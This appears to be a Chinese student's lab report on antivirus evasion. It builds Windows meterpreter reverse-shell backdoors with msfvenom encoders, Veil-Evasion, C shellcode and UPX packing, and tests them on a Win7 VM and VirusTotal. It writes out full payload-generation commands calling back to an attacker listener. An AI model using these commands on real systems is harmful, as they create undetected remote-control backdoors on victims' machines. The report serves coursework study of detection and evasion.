2017-2018-2 20155225《網絡對抗技術》實驗三 免殺原理與實踐

2017-2018-2 20155225《網絡對抗技術》實驗三 免殺原理與實踐

免殺工具1——msfvenom使用編碼器

知道msfvenom的編碼原理，就知道無論迭代編碼多少次都沒用，總有一段譯碼指令在頭部，這個頭部就在特徵庫裏，一下就檢測出來了。

但仍是試試吧。編碼方式選shikata_ga_nai；迭代編碼10次；還能夠用-x使用自定義可執行文件模板，那就選一個windows下計算器程序（calc.exe）做爲模板。

因此，指令是這樣的：

msfvenom -p windows/meterpreter/reverse_tcp -x calc.exe -e x86/shikata_ga_nai -i 10 LHOST=192.168.226.129 LPORT=443 -f exe > rcu.exe

剛一放到win7上，就被騰訊電腦管家秒刪了……

放到VirusTotal上測一下呢，哇，報毒率49/65。但是，剩下16/65的殺軟都在幹嗎……這麼明顯的木馬都掃不出來？？？

免殺工具2——Veil-Evasion

Veil是一款利用Metasploit框架生成相兼容的Payload工具，而且在大多數網絡環境中Veil 能繞過常見的殺毒軟件，它會盡量使每一個payload文件隨機。

首先安裝Veil-Evasion就是個問題。整整裝了一天，終於搞好了。而後在網上找了一個教程學習一下使用方法。使用veil-evasion打造免殺payload(1)

我用的6號payload——c/meterpreter/rev_tcp,成功產生木馬文件ps5225.exe。如圖：

把這個木馬拷貝到靶機win7裏，立馬被騰訊電腦管家給秒刪了……很悲傷，但仍是連了一下主機試試看veil生成的木馬有沒有用，設置監聽的時候，是沒有c/meterpreter/rev_tcp這個payload的，只能用windows/meterpreter/reverse_tcp，試了一下是能夠的。如圖：

再放到VirusTotal上測一下呢。掃描出來的結果是31/67，比以前好多了。

免殺技術3——C語言調用Shellcode

先用這條指令生成一個C語言格式的shellcode數組：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.226.129 LPORT=443 -f c

再把shellcode數組寫成一個程序。

這裏，你們會遇到一個很是棘手的問題，就是交叉編譯。i686-w64-mingw32-XXX是Linux平臺的交叉編譯器。又一個安裝問題來了……看了好多解決方法，其中提到說Ubuntu裏面直接就有mingw32，因此我靈機一動把kali生成的met.c，直接拿到Ubuntu裏作交叉編譯,成功獲得met.exe！！

把met.exe放到win7靶機裏實測能夠回連，如圖：

把met.exe放到win7的時候很忐忑，很怕被再次秒刪……結果，電腦管家沒有發現！嘿嘿，放到到VirusTotal上測一下呢，報毒率仍是31/67。

免殺技術4——加殼

加殼的全稱應該是可執行程序資源壓縮，壓縮後的程序能夠直接運行。

• 壓縮殼（UPX）

給以前的met.exe加個殼獲得met_upxed.exe：

並且成功回連了

報毒率爲27/66

後門剛拷到win7上的時候，電腦管家沒有報毒，可鏈接一次以後，馬上就被刪了，說明電腦管家多是根據軟件行爲報毒。

遇到的問題

1. vim如何與外界複製粘貼

具體參考vim 如何與外界粘貼複製

1. 交叉編譯時，提示沒法定位mingw32包。

Ubuntu下，mingw32很好安裝，婁老師課上用的Ubuntu虛擬機能夠很順暢地安裝好mingw32。

基礎問題回答

（1）殺軟是如何檢測出惡意代碼的？

研究惡意代碼提取特徵碼，放到特徵庫，進行特徵匹配；監控各軟件行爲，分析軟件行爲，有主動鏈接遠程控制端等行爲，被判斷爲後門。

（2）免殺是作什麼？

免殺就是避免被殺毒軟件發現啊……

（3）免殺的基本方法有哪些？

能夠利用免殺工具，好比veil，能夠加殼，或者用C語言調用shellcode。

實踐總結與體會

此次實驗是在前一個後門原理實驗上的進階，須要對後門技術的熟練掌握和運用。同時，安裝軟件配置環境真的很考驗解決問題的能力。收穫不少，以後想繼續學習，爭取作一個徹底免殺的後門出來。

離實戰還缺些什麼技術或步驟？

離實戰的話，感受還差得很遠呢，還須要進行信息收集，漏洞分析，而後根據漏洞，構造後門，以及隱藏，痕跡清理等。